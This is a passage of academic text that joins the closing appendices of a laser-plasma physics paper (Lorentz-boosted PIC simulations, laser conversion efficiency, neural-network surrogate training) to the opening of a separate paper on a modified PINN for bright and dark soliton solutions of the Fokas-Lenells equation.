a^{\prime}_{0}&=a_{0}\;,\end{split} \tag{11}\] where \(k^{\prime}_{y}\) is the y-component of the wave vector in the boosted system, showing that, indeed, the laser is now at normal incidence. Note that the dimensionless laser amplitude \(a_{0}\) is invariant under the transformation [54]. Further, denoting PIC code units with a tilde, we find \[\begin{split}\tilde{x}^{\prime}&=\tilde{x}/\gamma_{0}\\ \tilde{t}^{\prime}&=\tilde{t}/\gamma_{0}^{2}\end{split} \tag{12}\] giving a re-scaling of both the simulation time as well as the cell grid. The initial particle density is also affected by \[\tilde{n}^{\prime}_{0}=\tilde{n}_{0}\cdot\gamma_{0}^{3}\;. \tag{13}\] With these conditions, the particles can be initialized in the boosted frame. The relative velocity \(v_{y}\) is added as a permanent drift which is handled and relativistically added to the particles by the code. From the diagnostics in the simulation, we can obtain desired quantities via a back transformation. For the particle kinetic energies, we find using the energy-momentum relation: \[\begin{split}\tilde{E}&=\gamma_{0}(\tilde{E}^{\prime }+\tilde{v}_{y}\tilde{p}^{\prime}_{y})\\ &=\gamma_{0}\left(\frac{1}{m_{\text{e}}c^{2}}\sqrt{{p^{\prime}}^ {2}c^{2}+(m_{0}c^{2})^{2}}+\tilde{v}_{y}\tilde{p}^{\prime}_{y}\right)\\ \Rightarrow E_{\text{kin}}&=\gamma_{0}m_{\text{e}}c^{2 }\left(\sqrt{\tilde{p}^{\prime 2}+\frac{m_{0}^{2}}{m_{\text{e}}^{2}}}+\tilde{v}_{y} \tilde{p}^{\prime}_{y}\right)-m_{0}c^{2}\;,\end{split} \tag{14}\] where \(m_{0}\) is the particle rest mass. Noting that \(\tilde{B}^{\prime}_{x}=0\), we can find relations to recover the fields of the laser. The non-zero fields are: \[\begin{split}\text{For s-polarization:}\\ \tilde{E}_{z}&=\tilde{E}^{\prime}_{z}\\ \tilde{B}_{x}&=\tilde{v}_{y}\tilde{E}^{\prime}_{z}\\ \tilde{B}_{y}&=\tilde{B}^{\prime}_{y}/\gamma_{0}\\ \text{For p-polarization:}\\ \tilde{E}_{x}&=\tilde{E}^{\prime}_{x}-\tilde{v}_{y} \tilde{B}^{\prime}_{z}\\ \tilde{E}_{y}&=\tilde{E}^{\prime}_{y}/\gamma_{0}\\ \tilde{B}_{z}&=\tilde{B}^{\prime}_{z}-\tilde{v}_{y} \tilde{E}^{\prime}_{x}\end{split} \tag{15}\] Using the field transformations and assuming that reflection at the plasma surface does not change polarization, we find for the absolute magnitude of the Poynting vector: \[|\vec{S}|=|\vec{S}^{\prime}|\cdot\gamma_{0}^{2}\;, \tag{16}\] with which the relative absorption of the laser into the plasma can be calculated by dividing the incoming Poynting flux by the outgoing Poynting flux. It should be noted that while the Lorentz boosted frame method can replicate incidence angle-based behavior, it cannot replace a 2D or even 3D simulation on all accounts [54]. Firstly, in the general case, all physical quantities depend separately on the transformed coordinates \(x,y,z,t,p_{x},p_{y},p_{z}\). Thus, the Lorentz-boosted simulation can only be used for a problem independent of \(y\) and \(z\). Additionally, reducing the geometry after the boost to 1D limits the spatial dynamics of the particles. Since only the \(x\)-axis is present, all particles (while having 3D velocities) can only move along a straight line (i.e. have only Figure 11: Schematic of the Lorentz boosted simulation frame versus the implied lab frame. In the simulation frame, the laser appears to be at normal incidence onto the target while the particles appear to drift in negative \(y\)-direction with velocity \(v_{y}\). 1 spatial dimension). This disregards the angular spread at the back of the target such that the particles can be accelerated for longer times and thus end up with higher energies compared to a similar 2D simulation. Distinctly 2D effects such as hole boring can also not be modeled accurately. To illustrate the capabilities of this method, however, the relative laser absorption of a p-polarized laser impinging on a hydrogen plasma target was measured for varying laser incidence angles using the above method in the Smilei PIC code. The resulting absorption curve is shown in Figure 12. The results agree well with 2D simulations by Cui et al. [55] using a similar target and laser (see Figure 14 for a comparison). ### Explicit Lorentz Boost for oblique Laser Incidence In the following section we discuss the full transformation in more detail, and explicitly calculate the relations we mentioned before. Starting from the transformation matrix in Equation C1 the full derivation will be done for all quantities in the system. Firstly, the four-position \(R\), the four-momentum \(P\), the four-wave vector \(K\) and the four-current \(J\) are given as follows: \[\begin{split} R&=(ct,x,y,z)^{\top}\\ P&=(\gamma m_{0}c,p_{x},p_{y},p_{z})^{\top}\\ K&=(\omega_{\text{L}}/c,k\cdot\cos(\theta),k\cdot \sin(\theta),0)^{\top}\\ J&=(c\rho,j_{x},j_{y},j_{z})^{\top}\end{split} \tag{10}\] where \(k=\omega_{\text{L}}/c\) is the magnitude of the wave vector, \(\rho\) is the charge density and \(\tilde{j}\) is the current density. Here, the geometry of the wave vector from Figure 11 has already been applied, reducing the wave vector to two spatial dimensions. By left multiplication of \(\Lambda\) these quantities can be transformed into the boosted frame. This multiplication yields \[\begin{split} R^{\prime}&=(\gamma_{0}(ct-y\beta_{0 }),x,\gamma_{0}(y-ct\beta_{0}),z)^{\top}\\ P^{\prime}&=(\gamma_{0}(\gamma m_{0}c-p_{y}\beta_{0 }),p_{x},\gamma_{0}(p_{y}-\gamma m_{0}c\beta_{0}),p_{z})^{\top}\\ K^{\prime}&=(\omega_{\text{L}}/(c\gamma_{0}),k_{0}/ \gamma_{0},0,0)^{\top}\\ J^{\prime}&=(\gamma_{0}(c\rho-j_{y}\beta_{0}),j_{x},\gamma_{0}(j_{y}-c\rho\beta_{0}),j_{z})^{\top}\end{split} \tag{11}\] where a prime indicates quantities in the transformed system and \(\beta_{0}=v_{y}/c=\sin(\theta)\). Most importantly here we find \(k^{\prime}_{y}=0\) and \(\omega^{\prime}_{\text{L}}=\omega_{\text{L}}/\gamma_{0}\). Also, since the particles are assumed cold at \(t=0\), we find for the initial density \(\rho^{\prime}_{0}=\gamma_{0}\rho_{0}\). The next transformation is for the electromagnetic fields. Here, we differentiate between s- and p-polarized incidence lasers. To transform the electric and magnetic fields of the incoming laser, the electromagnetic tensor is used: \[F^{\mu\nu}_{\text{s-pol}} =\begin{pmatrix}0&0&0&-E_{z}/c\\ 0&0&0&B_{y}\\ 0&0&0&-B_{x}\\ E_{z}/c&-B_{y}&B_{x}&0\end{pmatrix} \tag{12}\] \[F^{\mu\nu}_{\text{p-pol}} =\begin{pmatrix}0&-E_{x}/c&-E_{y}/c&0\\ E_{x}/c&0&-B_{z}&0\\ E_{y}/c&B_{z}&0&0\\ 0&0&0&0\end{pmatrix}\;. \tag{13}\] The Lorentz transformation of such a tensor is given by: \[F^{\mu^{\prime}\nu^{\prime}}=\Lambda^{\mu^{\prime}}_{\;\;\;\mu}\Lambda^{\nu^{ \prime}}_{\;\;\;\nu}F^{\mu\nu}\;, \tag{14}\] where a prime again indicates quantities in the transformed system. The calculated fields are \[\left.\begin{aligned} E^{\prime}_{x}&=0\\ E^{\prime}_{y}&=0\\ E^{\prime}_{z}&=\gamma_{0}(E_{z}-v_{y}B_{x})\\ B^{\prime}_{x}&=\gamma_{0}(B_{x}-E_{z}v_{y}/c^{2})\\ B^{\prime}_{y}&=B_{y}\\ B^{\prime}_{z}&=0\\ E^{\prime}_{x}&=\gamma_{0}(E_{x}+v_{y}B_{z})\\ E^{\prime}_{y}&=E_{y}\\ E^{\prime}_{z}&=0\\ B^{\prime}_{x}&=0\\ B^{\prime}_{y}&=0\\ B^{\prime}_{z}&=\gamma_{0}(B_{z}+E_{x}v_{y}/c^{2})\end{aligned}\right\} \text{s-pol} \tag{15}\] Figure 12: Simulation of laser incidence angles between \(0^{\circ}\) and \(85^{\circ}\). The plot shows the incidence angle versus the relative absorption of a laser into a hydrogen plasma target (dotted red line) as well as the maximum proton kinetic energy behind the target (blue solid line). The laser impinges on the target with p-polarized fields. Classical resonance absorption, also known as the Desinov curve [56], is shown as a dashed line. where \(E^{\prime}_{x},B^{\prime}_{x}\stackrel{{!}}{{=}}0\) since the laser is at normal incidence in the boosted system. For absorption measurements, it is useful to have a look at the transformation of the Poynting Vector \(\vec{S}\). We first define in vacuum \[\vec{S}=\frac{1}{\mu_{0}}\vec{E}\times\vec{B}\;, \tag{109}\] where \(\mu_{0}\) is the vacuum permeability. As an example, we will only present the calculation in the p-polarization case. The s-polarization calculation is equivalent. We find \[\vec{S}_{\text{p-pol}} =\frac{1}{\mu_{0}}\left(E_{y}B_{z},-E_{x}B_{z},0\right)^{\top} \tag{110}\] \[\Rightarrow\vec{S}^{\prime}_{\text{p-pol}} =\frac{1}{\mu_{0}}(E^{\prime}_{y}B^{\prime}_{z},\underbrace{-E^{ \prime}_{x}B^{\prime}_{z}}_{=0},0)^{\top}\] (111) \[=\frac{1}{\mu_{0}}\left(E^{\prime}_{y}B^{\prime}_{z},0,0\right)^{ \top}\;. \tag{112}\] We hence find for the magnitude of the transformed Poynting Vector \[|\vec{S}^{\prime}_{\text{p-pol}}| =\frac{1}{\mu_{0}}\sqrt{E^{\prime 2}_{y}B^{\prime 2}_{z}} \tag{113}\] \[=\frac{1}{\mu_{0}c}E^{\prime 2}_{y}\;, \tag{114}\] since \(|\vec{B}|=|\vec{E}|/c\). On the other hand, inserting the transformation into \(\vec{S}\), we find \[\vec{S}_{\text{p-pol}} =\frac{1}{\mu_{0}}\begin{pmatrix}E^{\prime}_{y}\gamma_{0}\left(B^ {\prime}_{z}-E^{\prime}_{x}\frac{v_{y}}{c^{2}}\right)\\ -\gamma_{0}\left(E^{\prime}_{x}-v_{y}B^{\prime}_{z}\right)\gamma_{0}\left(B^{ \prime}_{z}-E^{\prime}_{x}\frac{v_{y}}{c^{2}}\right)\end{pmatrix} \tag{115}\] \[=\frac{1}{\mu_{0}}\begin{pmatrix}\gamma_{0}E^{\prime}_{y}B^{ \prime}_{z}\\ \gamma_{0}^{2}v_{y}B^{\prime 2}_{z}\\ 0\end{pmatrix} \tag{116}\] such that for the magnitude we have \[|\vec{S}_{\text{p-pol}}| =\frac{\gamma_{0}}{\mu_{0}}\sqrt{E^{\prime 2}_{y}B^{\prime 2}_{z}+ \gamma_{0}^{2}v_{y}^{2}B^{\prime 4}_{z}} \tag{117}\] \[=\frac{E^{\prime 2}_{y}\gamma_{0}}{\mu_{0}c}\sqrt{1+\gamma_{0}^{2} \frac{v_{y}^{2}}{c^{2}}}\;. \tag{118}\] The term in the square root can be resolved elegantly once we remind ourselves of the definition of \(v_{y}\): \[1+\gamma_{0}^{2}\frac{v_{y}^{2}}{c^{2}} =1+\frac{1}{\cos^{2}(\theta)}\frac{c^{2}\sin^{2}(\theta)}{c^{2}} \tag{119}\] \[=\frac{1}{\cos^{2}(\theta)}\] (120) \[=\gamma_{0}^{2}\;, \tag{121}\] and with that we have \[|\vec{S}_{\text{p-pol}}| =\frac{E^{\prime 2}_{y}\gamma_{0}}{\mu_{0}c}\;\gamma_{0} \tag{122}\] \[=|\vec{S}^{\prime}_{\text{p-pol}}|\cdot\gamma_{0}^{2}\;. \tag{123}\] Next, let us consider the transformed quantities in code units, so as to initialize the particles correctly in the PIC code. For the space coordinate, we find \[\tilde{x}^{\prime}=\frac{\omega^{\prime}x^{\prime}}{c}=\tilde{x}/\gamma_{0}\;, \tag{124}\] while for the time coordinate, since \(\tilde{y}^{\prime}\stackrel{{!}}{{=}}0\): \[0\stackrel{{!}}{{=}}\tilde{y}^{\prime} =\frac{\omega^{\prime}}{c}\gamma_{0}(y-ct\beta_{0}) \tag{125}\] \[=\tilde{y}-\tilde{t}\tilde{v}_{y}\] (126) \[\Rightarrow\tilde{t}^{\prime} =\omega^{\prime}\gamma_{0}\left(t-\frac{y}{c}\beta_{0}\right)\] (127) \[=\tilde{t}-\tilde{y}\tilde{v}_{y}\] (128) \[=\tilde{t}-\tilde{t}\tilde{v}_{y}^{2}\] (129) \[=\tilde{t}/\gamma_{0}^{2} \tag{130}\] Finally, the critical density transforms as \[\frac{n^{\prime}_{\text{c}}}{n_{\text{c}}}=\frac{\omega^{\prime 2}}{\omega^{2}}= \frac{1}{\gamma_{0}^{2}}\;, \tag{131}\] such that the initial particle densities in code units become \[\tilde{n}^{\prime}_{0}=\frac{n^{\prime}_{0}}{n^{\prime}_{\text{c}}}=\tilde{n} _{0}\cdot\gamma_{0}^{3}\;. \tag{132}\] A verification plot for the Lorentz Boost method is displayed in Figure 13 for irradiation under an oblique angle. ## Appendix D Laser Conversion Efficiency The laser conversion efficiency is an important quantity to characterize particle acceleration and especially laser-plasma acceleration. In order to retrieve information about the energy in the output spectrum of a TNSA Figure 13: Example result for a Lorentz-boosted simulation with an angle of 40 degrees. The dashed line denotes the fit of Mora’s model Mora (1966) to the data. experiment, consider first a spectrum \(\mathrm{d}N/\mathrm{d}E\) recorded in multiple energy bins of width \(\Delta E\). In this case, the number of particles in bin \(i\) is given by the bin's height multiplied by its width, i.e. \[N_{i}=\left(\frac{\mathrm{d}N}{\mathrm{d}E}\right)_{i}\cdot\Delta E\;. \tag{10}\] Hence, the total energy of the particles within the bin could be approximated by multiplying the particles in the bin by the bin's central energy \(E_{i}\). Summing over all bins yields the total energy of the particles \[E_{\mathrm{tot}}=\sum_{i}\left(\frac{\mathrm{d}N}{\mathrm{d}E}\right)_{i} \cdot\Delta E\cdot E_{i}\;, \tag{11}\] which can be generalized in the continuous limit \(\Delta E\to 0\), giving \[E_{\mathrm{tot}}=\int_{0}^{\infty}\frac{\mathrm{d}N}{\mathrm{d}E}\cdot E \,\mathrm{d}E\;. \tag{12}\] Concretely, adjusting for the output format of the neural network models the total energy is given by \[E_{\mathrm{tot}}=V\cdot\int_{0}^{E_{\mathrm{max}}}\exp\left(\ln\left(\frac{ \mathrm{d}n}{\mathrm{d}E}\right)\right)\cdot E\,\mathrm{d}E\;, \tag{13}\] where \(\ln\left(\frac{\mathrm{d}n}{\mathrm{d}E}\right)\) and \(E_{\mathrm{max}}\) are given by the neural network models and \(V\) is a unit volume. To obtain a measure for the energy conversion efficiency then, the above integral should be weighted by the laser pulse energy \(E_{\mathrm{L}}\), resulting in the maximization problem shown in Eq. (6). ## Appendix E Neural Network Training and preparation In this section, we discuss the chosen parameter ranges for the surrogate models based on neural networks. Training surrogate models is a tedious and numerically expensive task. This means that we have to be clear about the parameters and data used for the training process. We will first focus on the data preparation task, and second on the numerical hyperparameters chosen for our model. Both parts are important if we want to create fast converging models. ### Data preparation Neural networks can only be as good as the data used for training them. Convergence is important and data, therefore, has to be prepared properly. We can only investigate the multi-species effect and subsequent optimizations if we take the full spectrum into account. The spectral data for the output spectrum is taken on a logarithmic scale since the count rates vary over several orders of magnitude. The logarithmic data can directly be used to train a model. We tried using the data directly, but convergence was problematic. This is due to the noise of the data and the mixture-depending shifts of multi-species plateaus. The signal variation in both cases is similar and it is therefore difficult for the network to fit the dependencies. To mitigate this we applied a Savitzky-Golay filter [57] with a window size of 7 points and a 3rd-order polynomial. This filter decreased the noise-based fluctuations and allowed subsequent convergence. We display a comparison for filtered and unfiltered data in Figure 15, which shows, that the major behavior of the curves is reproduced but the bin-to-bin fluctuations in the mid to high energy range are minimized. ### Numerical Parameters, Training and Topology As none of the architectural parameters for these models were known, some outlying hyperparameters were decided first. For a regression problem, the Rectified Linear Unit (ReLU) activation function is widely used and was added to every layer of the network except the output layer which used the identity activation. Similarly, we chose the mean squared error, suited for regression problems, as loss and it was minimized using the Adam optimizer with \(\beta_{1}=0.9\), \(\beta_{2}=0.999\) and \(\epsilon=1\times 10^{-7}\). The initial learning rate was 0.001 which was lowered to a minimum of 0.0001 during training should the optimizer detect a plateau in the validation loss value (Keras' ReduceLROnPlateau feature). In order for the physical parameters to be more manageable numerically, all parameters were divided by the maximum value in their range (see Table 1) before being given to the model. With these outlying parameters in place, the architecture of the FCNs, i.e. the number of layers and the number of neurons in each layer, was left variable and was optimized for the problem using a hyperparameter tuning method. Keras Tuner allows for extensive hyperparameter tuning using various optimization algorithms [31]. Figure 14: Plot of the absorption of energy in the Lorentz boosted simulation in comparison to the data from Cui et al. [55]. Recalling section II.2, each simulation output contains information about 100 locations in the energy spectrum of the particles. Hence, for the reduced continuous model, the available data length was \(68973\times 100=6897300\) data points. Of these, 81% were used for training, 9% were used for validation, and 10% were used for testing. Running Keras Tuner on Google Cloud Compute Engine API from a Google Colab Notebook, Bayesian Optimization could be performed for the hyperparameters of the continuous model of hydrogen ions. In order to find a model architecture that most accurately describes the simulation results the number of layers and the number of neurons for each layer was first optimized to achieve the lowest possible training loss. Every training used a batch size of 256 and an early stopping mechanism. After 50 trials, each running training twice in order to lower the chance of a bad local minimum, a suitable architecture was found. However, this optimized model was only tuned to minimize the training loss of the model without considering the validation data at all. To generalize the model, hyperparameter tuning was run again on the optimized architecture, this time with L1 and L2 regularization on each layer as the hyperparameters to be tuned and with the tuning objective set to the mean squared error on the validation set. Each hidden layer in the network has L1 regularization strength of \(1.98\times 10^{-6}\) and L2 regularization strength of \(3.07\times 10^{-8}\). The network achieved a mean squared error of 3.38 on the 620 757 randomly selected validation data points. As a reminder, this number is equal to the mean squared error on the \(\ln\left(\frac{\mathrm{dn}}{\mathrm{d}\mathrm{E}}(E)\right)\) prediction for input parameters \(\{E,[\text{physical parameters}]\}\). Equivalently, the second model predicting the maximum ion energy could be tuned and optimized. Since the maximum energy is only predicted per simulation and not per energy bin of the energy spectra, the second model was trained on 68 973 unique data points. This significantly smaller dataset made the model training on a home computer feasible. The optimized model for the maximum energy found L1 regularization strength of \(2.3\times 10^{-4}\) and L2 regularization strength of \(1.1\times 10^{-7}\).
2306.03105
Data driven localized wave solution of the Fokas-Lenells equation using modified PINN
We investigate data driven localized wave solutions of the Fokas-Lenells equation by using physics informed neural network(PINN). We improve basic PINN by incorporating control parameters into the residual loss function. We also add conserve quantity as another loss term to modify the PINN. Using modified PINN we obtain the data driven bright soliton and dark soliton solutions of Fokas-Lenells equation. Conserved quantities informed loss function achieve more accuracy in terms of relative L2 error between predicted and exact soliton solutions. We hope that the present investigation would be useful to study the applications of deep learning in nonlinear optics and other branches of nonlinear physics. Source codes are available at https://github.com/gautamksaharia/Fokas-Lenells
Gautam Kumar Saharia, Sagardeep Talukdar, Riki Dutta, Sudipta Nandy
2023-06-03T06:06:27Z
http://arxiv.org/abs/2306.03105v1
# Data driven localized wave solution of the Fokas-Lenells equation using modified PINN # Data driven localized wave solution of the Fokas-Lenells equation using modified PINN Gautam Kumar Saharia, Sagardeep Talukdar, Riki Dutta and Sudipta Nandy email: [email protected] Abstract We investigate data driven localized wave solutions of the Fokas-Lenells equation by using physics informed neural network(PINN). We improve basic PINN by incorporating control parameters into the residual loss function. We also add conserve quantity as another loss term to modify the PINN. Using modified PINN we obtain the data driven bright soliton and dark soliton solutions of Fokas-Lenells equation. Conserved quantities informed loss function achieve more accuracy in terms of relative \(L2\) error between predicted and exact soliton solutions. We hope that the present investigation would be useful to study the applications of deep learning in nonlinear optics and other branches of nonlinear physics. Source codes are available at [https://github.com/gautamksaharia/Fokas-Lenells](https://github.com/gautamksaharia/Fokas-Lenells) ## 1 Introduction Fokas-Lenells equation(FLE) [1, 2] is one of the four integrable equations which describes stable propagation of ultrashort pulses in nonlinear mediums. Significance of this equation lies on the presence of spatio-temporal term in addition to group velocity dispersion term. This equation is used to model the propagation of ultra-fast light pulses in nonlinear mediums such as pulse propagation in monomode optical fiber. The other three integrable equations are nonlinear Schrodinger equation (NLSE) [3, 4], derivative NLSE (DNLSE) [5], higher order NLSE (HNLSE) [6, 7]. All four equations play a significant role in the study of localized waves in nonlinear optical mediums [8]. Nonlinear equations do not always yield stable solutions or even a solution. There are only a few analytical techniques available to deal with such solutions. While the analytical methods, namely inverse scattering transformation [9], direct bi-linear method [10, 11] are elegant but problem specific and are applicable to mostly integrable cases. Due to the unavailability of analytical solution in many cases, numerical methods and other approximation methods[12, 13] are used as an alternative technique [14]. However, the accuracy of the solution depends on a number of parameters, namely the number of iterations, calculation of higher order differential terms, step size etc. Moreover, some complex numerical methods are found to be very time consuming and computationally expensive. Such computationally intensive resources are not available to everyone. There is an urgent need for more general approaches to overcome limitations of analytical and numerical methods. Deep neural network (DNN) is one of the important discoveries in the 20th century. After a few initial successes it failed to generate much interest but it returned in the 21st century and showed promising results when applied to a variety of fields across arts and science, namely in language processing [15], image recognition [16] and many others [17]. DNN generated results have shown enough potential to be a good alternative to the analytical and numerical methods specially in solving complex nonlinear differential equations. This is because of the most recent improvements in the computation powers and availability of abundance data. The neural network also has an obvious advantage over the analytical and numerical method in that the neural network avoids complex calculations and formulas used in the conventional methods. Recently Raissi et al. introduced PINN, which is computationally more efficient than traditional numerical methods, especially when the physical laws are highly nonlinear or when the geometrical domain is large and complex. After the discovery of PINN, many modifications and improvements of this method have been developed and applied to numerous fields [18, 19, 20, 21, 22, 23]. While PINNs are becoming more popular, but up to this point PINNs were not capable of accurately simulating many nonlinear dynamical systems. Some researchers addressed this drawback by modifying the loss function to increase accuracy of PINN. This resulted in overcoming some of the earlier problems seen with basic PINN. To mention a few notable approaches are, using a self adaptive loss function through the adaptive weights for each loss term [24], using a soft attention mechanism where the adaptation weights are fully trainable and applied to each training point individually [25], least squares weighted residual (LSWR) method [26], re-formulation of PINN loss functions that can explicitly account for physical laws during model training [27], gradient optimization algorithm which balances the interaction between different terms in the loss function during model training by means of gradient statistics [28]. PINN is applied to many nonlinear equations in optics with high degree of success, namely Raissi et. al. predicted optical soliton solution of NLSE[29], fang et al. [30] predicted femtosecond optical soliton of the high-order NLSE, peng et al. obtained rogue periodic wave of Chen-Lee-Liu equation[31]. Data-driven solutions and parameter discovery of other nonlinear systems such as defocusing NLSE with the time dependent potential [32], Manakov system [33], generalized Gross-Pitaevskii (GP) equation with PT symmetric potentials [34], the Sasa-Satsuma [35], Yajima-Oikawa (YO) system [36], dark soliton of multi-component Manakov model [37], LakshmananPorsezian-Daniel [38] have been reported. In all the above mentioned problems only dynamical equations along with initial-boundary conditions are used as physical information. However, the benefits of using the conserved quantity of the integrable system to the PINN method have not received enough attention. Conserved quantities are crucial in study ing various optical dynamics, namely the stability of solitons, soliton collisions and testing the stability of numerical methods. Therefore, incorporating the information of conserved quantities should improve the performance of neural networks by improving the convergence as well as generalization of neural networks. Wu et. al. [39] has used this concept to predict optical solitons of NLSE and other notable contributions to mention are [40, 41]. To our knowledge, the data-driven solution of FLE using conservation law in the PINN is not reported earlier. During our investigation we noticed that the basic PINN algorithm converges to the minimum but cannot learn the complex dynamics of FLE efficiently. Therefore, it becomes important to study complex solutions of FLE by modifying existing PINN. In this paper, we improve the PINN by modifying the loss function by incorporating a few of the conserved quantities along with other physical information into the loss function. Here, we aim to generate data driven bright soliton and dark soliton solution of FLE using modified PINN. We have shown conserved quantities informed loss function achieve more accuracy in terms of relative \(L2\) error between predicted and exact solution. This paper is organized as follows. We present a review of FLE along with its analytical bright and dark soliton solutions in section 2. In section 3 we describe the basic PINN structure and present the modified PINN structure by adding conserved quantities in the loss function. We show our results in section 4 and section 5 concludes the paper. ## 2 FLE and bright dark soliton solutions We consider the Fokas-Lenells equation \[u_{xt}=u-2i\sigma|u|^{2}u_{x} \tag{1}\] where \(u=u(x,t)\) is a complex valued function, where subscripts x and t denote partial differentiation with respect to \(x\) and \(t\). Here, \(|u|^{2}u_{x}\) accounts for the nonlinearity and \(u_{xt}\) is the spatio-temporal dispersion term. Under the vanishing background condition \(|u|\to 0\) as \(x\rightarrow\pm\infty\) we derive a bright soliton solution using Hirota bilinear method [42]. \[u=\frac{g_{1}}{f_{0}+f_{2}} \tag{2}\] where \[g_{1}=\alpha e^{\theta(x,t)}\] \[f_{0}=\beta\] \[f_{2}=\beta_{2}e^{\theta(x,t)+\theta^{*}(x,t)}\] \[\theta=px+\frac{t}{p}+\theta_{0}\] \[\beta_{2}=i\frac{|\alpha|^{2}|p|^{2}p}{\beta^{*}(p+p^{*})}\] \(\alpha\), \(\beta\), \(p\) and \(\theta_{0}\) are arbitrary complex constants, \(\alpha\) represent the polarization state, \(\beta\) represents the initial central position, \(p\) corresponds to the spectral parameter obtained in the Inverse scattering method and \(\theta_{0}\) represents the initial phase. For \(p=a+ib\) where \(a\) and \(b\) are real constant, we get the following form of bright 1-SS which we used in this paper. \[u=-\frac{2a}{a+ib}\frac{e^{\theta+i\chi}}{e^{2\theta}-b-ia} \tag{3}\] where \[\theta=a(x+vt)\] \[\chi=b(x-vt)\] \[v=\frac{1}{a^{2}+b^{2}}\] Again, considering FLE with non-vanishing boundary, we obtain following [43], the dark 1-SS on the background of a plane wave, that is, when \[u\rightarrow\rho e^{i(\kappa x-\omega t)},\quad x\rightarrow\pm\infty\] The dark 1-SS is \[u=\rho e^{i(\kappa x-\omega t)}\frac{1-\frac{k+b+ia}{2a}\frac{a+ib}{a-ib}e^{2 \theta}}{1+\frac{k+b-ia}{2a}e^{2\theta}} \tag{4}\] where the amplitude \(\rho\), frequency \(\omega\) and wave number \(\kappa\) of the plane wave are real constants and are constrained with the relation, namely \(\omega=\frac{1}{\kappa}+2\rho^{2}\). \(a\) and \(b\) are real constant given by \(a=\sqrt{k^{3}\rho^{2}(1+k\rho^{2})}sin(\phi)\) and \(b=k\rho^{2}+\sqrt{k^{3}\rho^{2}(1+k\rho^{2})}cos(\phi)\) and \(0<\phi<2\pi\) ## 3 PINN Deep learning method ### PINN In order to write PINN for FLE, we first simplify the complex structure of FLE. We convert \(u(x,t)\) into real and imaginary parts, namely \(u(x,t)\)=\(r(x,t)\) + \(i\)\(m(x,t)\), where \(r(x,t)\) and \(m(x,t)\) are real valued functions. Writing PINN for real and imaginary part of FLE as \(f_{r}\) and \(f_{m}\), we have: \[f_{r}:=\hat{r}_{xt}-\hat{r}-2(\hat{r}^{2}+\hat{m}^{2})\hat{m}_{x} \tag{5}\] \[f_{m}:=\hat{m}_{xt}-\hat{m}+2(\hat{r}^{2}+\hat{m}^{2})\hat{r}_{x} \tag{6}\] where \(\hat{r}(x,t;w,b)\) and \(\hat{m}(x,t;w,b)\) are the latent solutions of Neural Netowrks(NN) with the weight \(W\) and bias parameters \(b\), which have to be optimized to learn the exact solution \(u(x,t)\). We construct a feed-forward NN, which consists of an input layer, M number of hidden layers and an output layer as shown in Figure 1. The input layer takes the coordinates \((x,t)\) as input, multiplies them with weight \(W\) and adds bias \(b\) to it. Before sending them as an input to the next layer, we apply an activation function \(\sigma\), namely tanh to add non-linearity in the output. The network is called feed-forward because each hidden layer of the NN receives input from the previous layer. We use Glorot Normal initialization to randomly initialize the network weight \(W\) and bias term \(b\). The final NN representation is given by, \[u(X,\Theta)=\sigma(\sigma(\sigma(W_{0}X+b_{0})W_{1}+b_{1})W_{2}+b_{2})...... \tag{7}\] \(u(X,\Theta)=\left[\hat{r}(x,t;w,b),\hat{m}(x,t;w,b)\right]\) is the output of the NN, and \(X=(x,t)\) is the input to the NN, \(\Theta=\left\{W^{k},b^{k}\right\}_{k=1}^{M}\) represent trainable parameters in the NN and \(\sigma\) represents activation function. Our goal is to optimize these trainable parameters so that \(\hat{u}(x,t)\) satisfy the FLE and PINN \(f_{r}\) and \(f_{m}\) become minimum, such that the output of the NN approximates the solution of FLE, i.e. \(\hat{u}(x,t;w,b)\approx u(x,t)\). PINN \(f_{r}\) and \(f_{m}\) share same parameters with the NN \(u(X,\Theta)\) therefore, these common parameters are trained by minimizing the following loss function of the network: \[Loss(\Theta)=Loss_{r_{0}}+Loss_{m_{0}}+Loss_{r_{b}}+Loss_{m_{b}}+Loss_{f_{r}}+ Loss_{f_{m}} \tag{8}\] where, \(Loss_{r_{0}}\), \(Loss_{m_{0}}\), \(Loss_{r_{b}}\), \(Loss_{m_{b}}\), \(Loss_{f_{r}}\) and \(Loss_{f_{m}}\) are defined by \[Loss_{r_{0}}=\frac{1}{N_{0}}\sum_{i=1}^{N_{0}}|\hat{r}(x_{0}^{i},t_{0}^{i})-r_{ 0}^{i}|^{2},\quad Loss_{m_{0}}=\frac{1}{N_{0}}\sum_{i=1}^{N_{0}}|\hat{m}(x_{0}^ {i},t_{0}^{i})-m_{0}^{i}|^{2} \tag{9}\] \[Loss_{r_{b}}=\frac{1}{N_{b}}\sum_{i=1}^{N_{b}}|\hat{r}(x_{b}^{i},t_{b}^{i})-r_ {b}^{i}|^{2},\quad Loss_{m_{b}}=\frac{1}{N_{b}}\sum_{i=1}^{N_{b}}|\hat{m}(x_{b} ^{i},t_{b}^{i})-m_{b}^{i}|^{2} \tag{10}\] Figure 1: Schematic diagram of PINN. A NN consists of an input and an output layer and some number of hidden layers. \(\sigma\) represents activation functions in all layer. The input of the NN goes through all the hidden layers. Outputs of the NN, namely \(r\) and \(m\) are considered inputs for the initial and boundary condition loss functions, the physics equation loss function, and the conserve quantity loss function. The total loss function is the combination of all these loss functions, which are minimized by the ADAM optimizer. \[Loss_{f_{r}}=\frac{1}{N_{f}}\sum_{i=1}^{N_{f}}|f_{r}(x_{f}^{i},t_{f}^{i})|^{2}, \quad Loss_{f_{m}}=\frac{1}{N_{f}}\sum_{i=1}^{N_{f}}|f_{m}(x_{f}^{i},t_{f}^{i})| ^{2} \tag{11}\] Here, \(\left\{x_{0}^{i},t_{0}^{i};r_{0}^{i},m_{0}^{i}\right\}_{i=1}^{N_{0}}\) denotes initial data points, \(\left\{x_{b}^{i},t_{b}^{i};r_{b}^{i},m_{b}^{i}\right\}_{i=1}^{N_{b}}\) corresponds to collocation points on the boundary data, and \(\left\{x_{f}^{i},t_{f}^{i}\right\}_{i=1}^{N_{f}}\) represent the collocation points on \(f_{r}\) and \(f_{m}\). \(Loss_{r_{0}}\) and \(Loss_{m_{0}}\) corresponds to the loss on the initial data, \(Loss_{r_{b}}\) and \(Loss_{m_{b}}\) enforce the vanishing boundary conditions, and \(f_{r}\) and \(f_{m}\) penalizes the FLE for not being satisfied on the collocation points. These training data were obtained from an exact solution, considering their initial and boundary conditions. Collocation points are randomly chosen from a uniform distribution in the computational domain i.e. \(x\in[-L,L]\) and \(t\in[t_{0},t_{1}]\). With the help of the ADAM optimizer [44], we minimize the loss function by optimizing the trainable parameters 